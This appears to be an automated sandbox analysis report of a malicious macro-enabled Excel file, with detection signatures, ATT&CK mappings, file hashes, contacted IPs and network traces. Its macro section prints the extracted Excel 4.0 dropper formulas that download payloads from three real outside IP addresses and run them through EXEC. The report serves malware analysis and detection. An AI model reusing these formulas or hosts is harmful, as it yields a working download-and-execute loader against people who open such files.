Windows Analysis Report Decline-172917164-06242021.xlsm
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | Virustotal: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: |
Source: | File read: |
Source: | Key opened: |
Source: | Virustotal: |
Source: | Process created: |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: |
Source: | Thread sleep time: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Virtualization/Sandbox Evasion1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 18% | Virustotal | | |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | Avira URL Cloud | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | unknown |
| false | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | high |
| | false | | high |
| | false | | low |
| | false | | unknown |
| | false | | high |
| | false | | low |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.234.247.7 | unknown | Russian Federation | | 198004 | INTERKONEKT-ASPL | false |
5.253.62.174 | unknown | Russian Federation | | 57724 | DDOS-GUARDRU | false |
185.117.73.74 | unknown | Netherlands | | 60117 | HSAE | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 440340 |
Start date: | 25.06.2021 |
Start time: | 08:23:46 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 10s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Decline-172917164-06242021.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.expl.evad.winXLSM@7/7@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
08:25:31 | API Interceptor | |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
INTERKONEKT-ASPL | 20 associated samples | | malicious | | |
DDOS-GUARDRU | 20 associated samples | | malicious | | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 315878 |
Entropy (8bit): | 7.988901270632308 |
Encrypted: | false |
SSDEEP: | 6144:hRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZN3:hRMmEv2Bc/nvm8IKABfsYOmauFD |
MD5: | BB737290D394078D8A16D5509C5BC970 |
SHA1: | C8A63B0AB1EB7745A0027E0A17A6CB4C6F79487E |
SHA-256: | E11121ECA3FAD55F66EA240EADD4F5B4C978828C94C34736F7673540529B17A5 |
SHA-512: | 3D8A6025171D283FA08D8A5BA4EAAD1EABAD55D7D34629F17F4C6601DD4438FB536B29D7B8CA71E540EDB782433118628EBD3A56CE8FFA453C6A45792425CB9A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 328749 |
Entropy (8bit): | 7.982562663364122 |
Encrypted: | false |
SSDEEP: | 6144:bnlXRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZNe:blXRMmEv2Bc/nvm8IKABfsYOmauFjW |
MD5: | 1DDE60AF4802D997D564DCC19FCF8924 |
SHA1: | 01040AF635B254E2387CBDA2379A02C1ADD7B27B |
SHA-256: | 59B39E1F85E3318A929558831AB2D65DAAA38292B613F65BDB8DBFD28ACE14A3 |
SHA-512: | 64FBD728A651D17147655F1EF88F6EE6F8EF64ECC693A426E0A15F8E54294BF4D28D24B7C0649CBF5D020F66EB39D1C613EEB2C3576796B1F29CAD48D0BB864C |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2198 |
Entropy (8bit): | 4.50661144098561 |
Encrypted: | false |
SSDEEP: | 48:81/XT0jFDt262TB+Qh21/XT0jFDt262TB+Q/:81/XojFDyd+Qh21/XojFDyd+Q/ |
MD5: | 2D3FA1E5457926B56AE6600BA3D476FA |
SHA1: | 2F3FA829061E0BD5BF8F24F2EF63DDABB39E478D |
SHA-256: | FE15AAA8305867D305D2944ED0BB890D09964D52FE972D0B169E3281204520F6 |
SHA-512: | 33D321AC668DB01BEAF3D3E1831917FD85591D6A26D23AC3C20246736CAC7DFE271676CDBC0EBBA1CC18D2FB10B9671EF829F3F4AC88AAE82F6E6D3191AE6CE2 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.47495889914137 |
Encrypted: | false |
SSDEEP: | 12:85QJF4FcLgXg/XAlCPCHaXtB8XzB/RwxX+WnicvbbbDtZ3YilMMEpxRljKzTdJP8:852D/XTd6jUxYejDv3q+rNru/ |
MD5: | 2580406BFAE06A1C59616E3B17B9C490 |
SHA1: | 7330C14D2F37BB8B2DBB21665DBE1F38C5342D06 |
SHA-256: | 4CA54148064EFC7BF7E77972F5F24F437F80F671C8DC0C6C1668737F5B6F5D61 |
SHA-512: | C2827E176CED0EC998DFFEEB8122DA69BECA81DDACDAB3277A85E4A15F0A920F9B040FB1F80640B36F977E401BB10B8F6F12512A4F4B05F4723B33B8B811ABF4 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133 |
Entropy (8bit): | 4.587558026448006 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWqGLtgLZbRFK6l51MLtgLZbRFK6lmxWqGLtgLZbRFK6lv:djnLlPrJLlPoLlP1 |
MD5: | C583482E01AB0E15D757BF76E7C5D737 |
SHA1: | FAD60796DF25EA9F73455FEF5ACB980371425D1C |
SHA-256: | 39089D648F6A966B83E19AC3FEC4BF268C7574340248FE1700B47B497210812F |
SHA-512: | E8D50E7882FF9D6F3BAD87B167D4AD7BB4484966059E97D38FFF4F04E57318C3ABF21A02AD5B7E749694205077D174234C09D8469ADB04B7BB058253728061AD |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 328749 |
Entropy (8bit): | 7.982577224576017 |
Encrypted: | false |
SSDEEP: | 6144:bnlXRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZNa:blXRMmEv2Bc/nvm8IKABfsYOmauFjC |
MD5: | 4D63C3DCB6D2C3F5839B7FE96E34939D |
SHA1: | 8DAF3CA9BE70E9FE8BE12F12124F10E1AD077DDA |
SHA-256: | 744118B0D611EED117C6907221549EAE6D477206EDD837F30EE55FABC2D8E328 |
SHA-512: | 7278D22DD1495189808B45774FBC3E5CFCEDFDF012C2B0134569CD9A90CAC2EC34EF94DD0B9C190D58712925AAC5371ECEBBAAFFA411D0F1B432604CEEEE034B |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.982649799738301 |
TrID: |
|
File name: | Decline-172917164-06242021.xlsm |
File size: | 329298 |
MD5: | f022a2159442cd4e16d7fe3dee1d634b |
SHA1: | cd4a698d83059462498e48b8dec47662bd2a0ec4 |
SHA256: | 4bd593279e649fae847a2b702655c571d7ca9e1949a422fa8d289250aeaa3305 |
SHA512: | ba433280caf91d3ee2b17848d398566e69802e1346573cbe16b4bb77045aa0a8739affcaa27e216018bb6b051dba2b6bf83503a88492b4aa470147c0c716a891 |
SSDEEP: | 6144:97u1GRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZw:97sGRMmEv2Bc/nvm8IKABfsYOmauFq |
File Content Preview: | PK..........!.^...............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General |
---|
Document Type: | OpenXML |
Number of OLE Files: | 1 |
OLE File "Decline-172917164-06242021.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
Raw cell dump of the Excel 4.0 macro sheet as extracted (comma-separated, empty cells included):

```
,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)",http://5.253.62.174/,"=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)",http://185.117.73.74/,"=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)",http://185.234.247.7/,"=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,=EXEC(Sheet2!O22),,"=EXEC(Sheet2!O22&""1"")",,"=EXEC(Sheet2!O22&""2"")",,,,,,,,,,=HALT(),
```

The same cells with CSV quoting removed and empty cells omitted, in sheet order:

```
=NOW()&H8
.dat
=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)
http://5.253.62.174/
=Jerutyg(0,F13&G8,"..\Kro.fis",0,0)
http://185.117.73.74/
=Jerutyg(0,F14&G8,"..\Kro.fis1",0,0)
http://185.234.247.7/
=Jerutyg(0,F15&G8,"..\Kro.fis2",0,0)
=EXEC(Sheet2!O22)
=EXEC(Sheet2!O22&"1")
=EXEC(Sheet2!O22&"2")
=HALT()
```
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
06/25/21-08:24:40.521992 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
06/25/21-08:24:41.376990 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.155 | 192.168.2.22 |
06/25/21-08:24:45.028969 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.155 | 192.168.2.22 |
06/25/21-08:24:51.240465 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.155 | 192.168.2.22 |
06/25/21-08:25:04.623723 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22 |
06/25/21-08:25:07.631782 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22 |
06/25/21-08:25:10.979362 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.2.158.153 | 192.168.2.22 |
06/25/21-08:25:22.914129 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 25, 2021 08:24:40.336123943 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:24:40.425620079 CEST | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
Jun 25, 2021 08:24:40.425707102 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:24:40.426493883 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:24:40.515687943 CEST | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
Jun 25, 2021 08:24:40.521991968 CEST | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
Jun 25, 2021 08:24:40.522126913 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:24:40.545172930 CEST | 49166 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:24:43.553692102 CEST | 49166 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:24:49.560177088 CEST | 49166 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:25:01.576529980 CEST | 49167 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:25:04.584395885 CEST | 49167 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:25:10.590897083 CEST | 49167 | 80 | 192.168.2.22 | 185.117.73.74 |
Jun 25, 2021 08:25:22.668386936 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:25:22.716211081 CEST | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Jun 25, 2021 08:25:22.716413975 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:25:22.717233896 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:25:22.763576984 CEST | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Jun 25, 2021 08:25:22.914129019 CEST | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Jun 25, 2021 08:25:22.914345026 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:25:45.528947115 CEST | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
Jun 25, 2021 08:25:45.529162884 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:26:27.916523933 CEST | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Jun 25, 2021 08:26:27.916800976 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:26:40.231090069 CEST | 49168 | 80 | 192.168.2.22 | 185.234.247.7 |
Jun 25, 2021 08:26:40.231400967 CEST | 49165 | 80 | 192.168.2.22 | 5.253.62.174 |
Jun 25, 2021 08:26:40.282500982 CEST | 80 | 49168 | 185.234.247.7 | 192.168.2.22 |
Jun 25, 2021 08:26:40.320980072 CEST | 80 | 49165 | 5.253.62.174 | 192.168.2.22 |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 5.253.62.174 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 25, 2021 08:24:40.426493883 CEST | 0 | OUT | |
Jun 25, 2021 08:24:40.521991968 CEST | 1 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 185.234.247.7 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 25, 2021 08:25:22.717233896 CEST | 2 | OUT | |
Jun 25, 2021 08:25:22.914129019 CEST | 3 | IN | |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 08:24:37 |
Start date: | 25/06/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f1c0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:23 |
Start date: | 25/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff790000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:23 |
Start date: | 25/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff790000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 08:25:23 |
Start date: | 25/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff790000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|